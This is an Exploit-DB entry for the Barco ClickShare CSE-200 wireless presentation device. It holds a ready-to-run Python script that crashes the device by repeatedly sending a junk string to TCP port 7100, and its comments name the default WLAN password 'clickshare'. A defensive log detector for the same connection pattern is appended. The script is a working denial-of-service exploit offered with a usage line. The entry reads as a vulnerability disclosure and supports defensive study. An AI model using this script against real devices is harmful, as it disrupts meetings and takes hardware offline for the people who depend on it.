Barco ClickShare CSE-200 – Remote Denial of Service

  • Author: Florian Hauser
    Date: 2018-04-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44456/
  • #!/usr/bin/python
    
    # Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service
    # Date: 11-04-2018
    # Hardware Link: https://www.barco.com/de/product/clickshare-cse-200
    # Exploit Author: Florian Hauser
    # Contact: florian DOT g DOT hauser AT gmail DOT com
    # CVE: requested by Barco
    # Category: Hardware
    
    #Disclaimer:
    #This or previous programs is for Educational 
    #purpose ONLY. Do not use it without permission. 
    #The usual disclaimer applies, especially the 
    #fact that Florian Hauser is not liable for any 
    #damages caused by direct or indirect use of the 
    #information or functionality provided by these 
    #programs. The author or any Internet provider 
    #bears NO responsibility for content or misuse 
    #of these programs or any derivatives thereof.
    #By using these programs you accept the fact 
    #that any damage (dataloss, system crash, 
    #system compromise, etc.) caused by the use 
    #of these programs is not Florian Hauser's 
    #responsibility.
    # 
    #Use them at your own risk!
    ################
    # Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):
    # Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-
    # not only disconnects all clients but also results in a crash of this hardware device
    # Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.
    # I got permission from Barco to disclose this vulnerability.
    # This affects potentially all other ClickShare products, Barco confirms
    
    import socket
    import sys
    from time import sleep
    
    if len(sys.argv) != 2:
    	print "Usage: exploit.py <ip>"
    	sys.exit(0)
    
    
    # Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.
    # 6-7 requests do the job usually
    for x in range(1,50):
    	#Create a new socket each time because otherwise the service drops the socket
    	#Same request cannot be sent several times in sequence
    	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    	
    	#Connect to vulnerable TCP port 7100
    	connect=s.connect((str(sys.argv[1]), 7100))
    	s.send('some evil string \r\n\n')
    	print "Buffer " + str(x) + " sent...\n"
    	
    	result=s.recv(1024)
    	print result
    	s.close()
    	
    	#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash
    	sleep(7)
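
Detection sketch for the pattern described above: one source opening a fresh, short-lived connection to TCP port 7100 every few seconds. This is an added example, not part of the original exploit or any Barco tooling. The log format, thresholds and addresses are constructed assumptions, and it assumes legitimate clients keep longer-lived sessions rather than reconnecting every few seconds.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample connection log, time-ordered (format is an assumption).
SAMPLE_LOG = """\
2018-04-11T10:00:00 src=192.168.2.23 dport=7100 duration=0.4
2018-04-11T10:00:03 src=192.168.2.40 dport=7100 duration=1800.0
2018-04-11T10:00:07 src=192.168.2.23 dport=7100 duration=0.3
2018-04-11T10:00:14 src=192.168.2.23 dport=7100 duration=0.4
2018-04-11T10:00:15 src=192.168.2.23 dport=443 duration=0.2
2018-04-11T10:00:21 src=192.168.2.23 dport=7100 duration=0.5
2018-04-11T10:00:28 src=192.168.2.23 dport=7100 duration=0.4
2018-04-11T10:00:35 src=192.168.2.23 dport=7100 duration=0.3
2018-04-11T10:05:00 src=192.168.2.51 dport=7100 duration=0.6
2018-04-11T10:10:00 src=192.168.2.51 dport=7100 duration=0.5
"""

LINE_RE = re.compile(r"^(\S+) src=(\S+) dport=(\d+) duration=([\d.]+)$")
PORT = 7100            # service port named in the advisory
WINDOW_S = 60          # assumed tuning value: look-back window in seconds
MIN_CONNS = 5          # assumed: the advisory reports 6-7 requests before a crash
MAX_DURATION_S = 2.0   # assumed: only count short-lived connections

def parse(log):
    """Yield (timestamp, source, dest port, duration) for well-formed lines."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dport, dur = m.groups()
            yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), src, int(dport), float(dur)

def detect(log):
    """Return {source: time of first alert} for repeated short connections."""
    recent = defaultdict(deque)   # per-source timestamps inside the window
    alerts = {}
    for ts, src, dport, dur in parse(log):
        if dport != PORT or dur > MAX_DURATION_S:
            continue
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > WINDOW_S:
            q.popleft()           # drop connections older than the window
        if len(q) >= MIN_CONNS and src not in alerts:
            alerts[src] = ts      # alert before the 6-7 request mark is reached
    return alerts
```

With these thresholds the alert fires on the fifth reconnect, which leaves time to block the source at the access point before the device is expected to fail.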